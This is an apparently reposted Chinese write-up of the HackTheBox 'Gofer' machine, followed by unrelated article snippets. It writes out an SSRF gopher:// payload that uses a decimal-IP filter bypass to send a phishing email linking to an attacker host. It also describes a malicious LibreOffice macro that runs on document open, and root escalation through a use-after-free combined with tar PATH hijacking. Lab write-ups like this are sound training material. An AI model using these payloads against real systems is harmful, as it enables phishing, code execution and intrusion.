HTB-Gofer

news2024/12/23 13:58:22

在这里插入图片描述

HTB-Gofer

  • 信息收集
  • 立足
  • jhudson -> tbuckley
  • root

信息收集

在这里插入图片描述
在这里插入图片描述

探索一阵子没有什么收获,去看看smb服务。

在这里插入图片描述
mail提到有一个proxy。

在这里插入图片描述
扫描子域找到proxy。

在这里插入图片描述
我们没有任何账号密码,试了常见的弱口令也没有任何效果。

在这里插入图片描述
在这里插入图片描述

要是我用POST会发生什么。
在这里插入图片描述

似乎不会发生什么, 写了一个简单的脚本试着跑一下
在这里插入图片描述

在这里插入图片描述

尝试了添加url来看看会发生什么。

在这里插入图片描述
在这里插入图片描述

使用file协议读文件试试。
在这里插入图片描述

希望gopher没在黑名单里面。

在这里插入图片描述

看起来不错,那看看能用gopher干些啥。

在这里插入图片描述
还有mail里面的内容,“重要的文件通过内部发送”、Jocelyn可能会点击邮件里的链接、odt格式。
在这里插入图片描述
想必现在应该对攻击方法很清楚了,创建一个odt让Jocelyn点一下上线。

在这里插入图片描述
但是目前有个问题,127和localhost在黑名单,首先要想个办法绕过它。

在这里插入图片描述

试试用进制绕过黑名单。

在这里插入图片描述
嗯,绕过成功。
在这里插入图片描述

用gopherus。
在这里插入图片描述

使用gopherus生成的payload似乎没有正常运行。

在这里插入图片描述

看看gopherus生成的payload

在这里插入图片描述

结合hacktricks来看。

在这里插入图片描述

在这里插入图片描述
将换行的改为%250d%250a,空格为%20格式化成这样。

在这里插入图片描述
提交发现成功与smtp交互。
在这里插入图片描述
但是我们的happycat没有动静。仔细看是因为收件人问题。

在这里插入图片描述
通过观察发现这位Jeff Davis的邮箱是j加davis。

在这里插入图片描述

所以我们Jocelyn Hudson应该是jhudson。

gopher://2130706433:25/xHELO%20%250d%250aMAIL%20FROM:<jdavis@gofer.htb>%250d%250aRCPT%20TO:<jhudson@gofer.htb>%250d%250aDATA%250d%250aFrom:%20[Hacker]%20<hacker@site.com>%250d%250aTo:%20<victime@site.com>%250d%250aDate:%20Tue,%2015%20Sep%202017%2017:20:26%20-0400%250d%250aSubject:%20AH%20AH%20AH%250d%250a<a%20href="http://10.10.14.12/happycat">cat</a>%250d%250a.%250d%250aQUIT%250d%250a

在这里插入图片描述
http服务也记录到了获取。
在这里插入图片描述
接下来就是制作恶意odt文件。

在这里插入图片描述
并且在Libreoffice帮助文档找到了一些有趣的东西。
在这里插入图片描述
在这里插入图片描述
准备payload的时候发现它会获取到123.odt%22,多一个双引号"。

在这里插入图片描述

既然123.odt后面会自己加一个双引号,那我就只弄左边双引号就好了吧。

在这里插入图片描述

好了,接下来就差payload了,官方文档看到shell函数在宏与脚本类。

在这里插入图片描述

那我在LibreOffice弄弄看。

在这里插入图片描述
在这里插入图片描述
编辑他。

在这里插入图片描述

中间填上Shell("c:\windows\calc.exe",2),后面数字可省略。

在这里插入图片描述

但是我保存了并用gopher获取了也没有任何动静,宏并没有执行,可能缺少前置条件。继续看官方文档的宏部分,上面提到可以为事件指定脚本。
在这里插入图片描述

并且在文档所描述部分找到了打开文档事件。

在这里插入图片描述
添加上我们构造好的宏。
在这里插入图片描述

但是还是没有反弹,这是为什么,我不理解。不知道是不是这个的原因。
在这里插入图片描述

全部重来,并且在这一步的时候将宏放在bad.odt上。

在这里插入图片描述

立足

然后就好了
在这里插入图片描述

jhudson -> tbuckley

在/etc/apache2/.htpasswd找到了tbuckley可能的密码哈希。

在这里插入图片描述
hashcat wiki上的hash样例找到这是apache的哈希。

在这里插入图片描述
用hashcat并没有任何结果,proxy那个网站有一个基础验证,看看我们能不能找到那个网站相关代码。
在这里插入图片描述
目前只能找到哈希,用pspy看看。

在这里插入图片描述
利用获取的账号密码用ssh登录目标。

在这里插入图片描述

root

检查SUID文件后,发现有一个程序notes。
在这里插入图片描述
运行后得到以下选项。

在这里插入图片描述

先去看看这个notes有些什么功能。功能如其名,除了6因为没有实现,和8需要管理员权限,其他都能正常使用。

在这里插入图片描述

所以逆向的时候重点关注8,因为它需要管理员权限。
在这里插入图片描述

忽略一看,先通过名字是admin来进入if语句,然后通过不是绝对路径的tar来提权。先看看1里面怎么判断s(role)的值。

在这里插入图片描述

通过getuid来判断,如果不是0一律为user,如果当前是0则是admin。目前没有sudo,所以推测时间任务会执行这个notes的8号功能。但是并没有发现相关时间任务。
在这里插入图片描述

接着看。3可以释放s分配的内存。

在这里插入图片描述

4的ptr又会本配40个字节内存,并且我么能输入39个字节

在这里插入图片描述
而1我们只能输入23个字节,admin角色所在的第24位字节以后我们不能控制。
在这里插入图片描述

重点来了,s指向一个内存区,然后s被释放后,它是否还会指向那个内存区?如果我新开的ptr正好撞上s之前指向的内存区,那我可不可以通过ptr来修改s?

在这里插入图片描述
应该可以。

在这里插入图片描述
在这里插入图片描述

能够成功使用8功能。

在这里插入图片描述
在当前目录创建一个tar。

在这里插入图片描述
然后把当前目录导入系统环境。

在这里插入图片描述
执行上面那个利用方法。
在这里插入图片描述

关于悬空指针。

在这里插入图片描述

不过有个问题,为什么我在本机实验,是有可能会开辟到同一块内存地址。为什么目标的一次就成功了。相同代码拿到不同系统下运行差距就出来了。

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/905113.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

idea 新建servlet 访问提示404 WebServlet注解找不到包 报错

检查访问路径是否设置正确 如果设置为name “/testServlet”&#xff0c;则会404 WebServlet注解报错找不到包 检查是否引入了tomcat依赖包

游戏msvcr120.dll丢失怎样修复?msvcr120.dll丢失常见原因

在尝试运行某些游戏时&#xff0c;我遇到了“msvcr120.dll丢失”的错误提示。经过一番调查和尝试&#xff0c;我成功地解决了这个问题。msvcr120.dll是Visual C Redistributable Package的一部分&#xff0c;它包含了许多运行Windows应用程序所需的库和函数。当游戏或其他应用程…

5.8.webrtc事件处理基础知识

在之前的课程中呢&#xff0c;我向你介绍了大量web rtc线程相关内容&#xff0c;今天呢&#xff0c;我们来看一下线程事件处理的基本知识。首先&#xff0c;我们要清楚啊&#xff0c;不同的平台处理事件的API是不一样的&#xff0c;这就如同我们当时创建线程是类似的&#xff0…

【算法刷题之链表篇(2)】

目录 1.leetcode-23. 合并 K 个升序链表&#xff08;较难&#xff09;&#xff08;1&#xff09;题目描述&#xff08;2&#xff09;方法一&#xff1a;顺序合并&#xff08;3&#xff09;方法二&#xff1a;分治合并&#xff08;4&#xff09;方法三&#xff1a;使用优先队列合…

2023国赛数学建模E题思路模型代码 高教社杯

本次比赛我们将会全程更新思路模型及代码&#xff0c;大家查看文末名片获取 之前国赛相关的资料和助攻可以查看 2022数学建模国赛C题思路分析_2022国赛c题matlab_UST数模社_的博客-CSDN博客 2022国赛数学建模A题B题C题D题资料思路汇总 高教社杯_2022国赛c题matlab_UST数模社…

C# 设置、获取程序,产品版本号

右键&#xff0c;程序属性。打开“程序集信息” 选择需要设置的版本信息。下面的代码&#xff0c;获取不同的设置内容。 string 其他 Assembly.GetExecutingAssembly().FullName; string 程序集版本 Assembly.GetExecutingAssembly().G…

(杭电多校)2023“钉耙编程”中国大学生算法设计超级联赛(10)

1003 Many Topological Problems 每个节点序号和权值分开计算,两者的排列组合数相乘即为答案 对于序号的顺序,一共有n个位置,第一个位置可以放序号1,2,..n共n个点,第二个则可放置n-1个点,以此类推,排列组合数为n的阶乘 对于权值,从小到大放置,如果不考虑k的话,对于权值为x的数,…

企培版edusoho对接第三方云视频点播 最新版本代码披露 支持m3u8视频加密

edusoho企培系列版本更新日志&#xff1a;新增功能和优化历史 倍数播放功能、视频分类、支持m3u8视频加密 \plugins\AliVideoPlugin\DependencyInjection\Configuration.php <?php namespace AliVideoPlugin\DependencyInjection; use Symfony\Component\Config\Definiti…

7-9 说反话-加强版

分数 20 全屏浏览题目 切换布局 作者 陈越 单位 浙江大学 给定一句英语&#xff0c;要求你编写程序&#xff0c;将句中所有单词的顺序颠倒输出。 输入格式&#xff1a; 测试输入包含一个测试用例&#xff0c;在一行内给出总长度不超过500 000的字符串。字符串由若干单词和…

Docker创建 LNMP 服务+Wordpress 网站平台

Docker创建 LNMP 服务Wordpress 网站平台 一.环境及准备工作 1.项目环境 公司在实际的生产环境中&#xff0c;需要使用 Docker 技术在一台主机上创建 LNMP 服务并运行 Wordpress 网站平台。然后对此服务进行相关的性能调优和管理工作。 容器 系统 IP地址 软件 nginx centos…

Log4j反序列化命令执行漏洞(CVE-2017-5645)Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

一.Log4j反序列化命令执行漏洞(CVE-2017-5645&#xff09; Apache Log4j是一个用于Java的日志记录库&#xff0c;其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码 环境&#xff1a;vulhub 工具下载地址&#xff1…

Docker容器:docker基础及网络

Docker容器&#xff1a;docker基础及安装 一.docker容器概述 1.什么是容器 &#xff08;1&#xff09;Docker是在Linux容器里运行应用的开源工具&#xff0c;是一种轻量级的“虚拟机”。 &#xff08;2&#xff09;是一个开源的应用容器引擎&#xff0c;基于go语言开发并遵…

sh 脚本循环语句和正则表达式

目录 1、循环语句 1、for 2、while 3、until 2、正则表达式 1、元字符 2、表示次数 3、位置锚定 4、分组 5、扩展正则表达式 1、循环语句 循环含义 将某代码段重复运行多次&#xff0c;通常有进入循环的条件和退出循环的条件 重复运行次数 循环次数事先已知 循环次…

RS232、RS422、RS485硬件及RS指令、RS2指令应用知识学习

RS232、RS422、RS485硬件及RS指令、RS2指令应用知识学习 一、串行&#xff08;异步/同步)通讯、并行通讯、以太网通讯 二、单工通讯/半双工通讯/双工通讯 三、常用硬件接口&#xff08;工业上基本是RS485两线制的接线&#xff09; 常用硬件接口RS232/RS422/RS485&#xff0c;…

Delegates.observable追踪观察可变数据更新,Kotlin

Delegates.observable追踪观察可变数据更新&#xff0c;Kotlin import kotlin.properties.Delegates import kotlin.reflect.KPropertyclass Person {var name: String by Delegates.observable("fly") { prop: KProperty<*>, old: String, new: String ->p…

SpringBoot 学习(04):Idea 中控制启动命令的详细过程 环境区分案例

Idea 启动SpringBoot的命令 C:\Users\Administrator\.jdks\corretto-17.0.8\bin\java.exe -XX:TieredStopAtLevel1 -Dspring.output.ansi.enabledalways -Dcom.sun.management.jmxremote -Dspring.jmx.enabledtrue -Dspring.liveBeansView.mbeanDomain -Dspring.applica…

EasyRecovery14数据恢复软件支持各类存储设备的数据恢复

EasyRecovery14数据恢复软件专业数据恢复软件支持电脑、相机、移动硬盘、U盘、SD卡、内存卡、光盘、本地电子邮件和 RAID 磁盘阵列等各类存储设备的数据恢复。 目前市面上有许多数据恢复软件&#xff0c;但褒贬不一&#xff0c;而且数据恢复软件又不是一款会被经常使用的软件&a…

【多模态】26、视觉-文本多模态任务超详细介绍 「CLIP/LSeg/ViLD/GLIP/ALBEF/BLIP/CoCa/BEIT」

文章目录 准备知识一、CLIP&#xff1a;不同模态简单对比的方法更适合于图文检索1.1 CLIP 在分割上的改进工作1.1.1 LSeg1.1.2 Group ViT 1.2 CLIP 在目标检测上的改进工作1.2.1 ViLD1.2.2 GLIPv11.2.3 GLIPv2 二、ViLT/ALBEF &#xff1a;多模态融合在 VQA/VR 任务中更重要三、…

基于protobuf和httplib的在线通讯录项目框架|Protobuf应用小项目

前言 那么这里博主先安利一些干货满满的专栏了&#xff01; 首先是博主的高质量博客的汇总&#xff0c;这个专栏里面的博客&#xff0c;都是博主最最用心写的一部分&#xff0c;干货满满&#xff0c;希望对大家有帮助。 高质量博客汇总https://blog.csdn.net/yu_cblog/categ…

学习设计模式之适配器模式,但是宝可梦

前言 作者在准备秋招中&#xff0c;学习设计模式&#xff0c;做点小笔记&#xff0c;用宝可梦为场景举例&#xff0c;有错误欢迎指出。 适配器模式 意图&#xff1a;将一个类的接口转换成客户希望的另一个接口 主要解决&#xff1a;把现有对象放到新环境里&#xff0c;而新…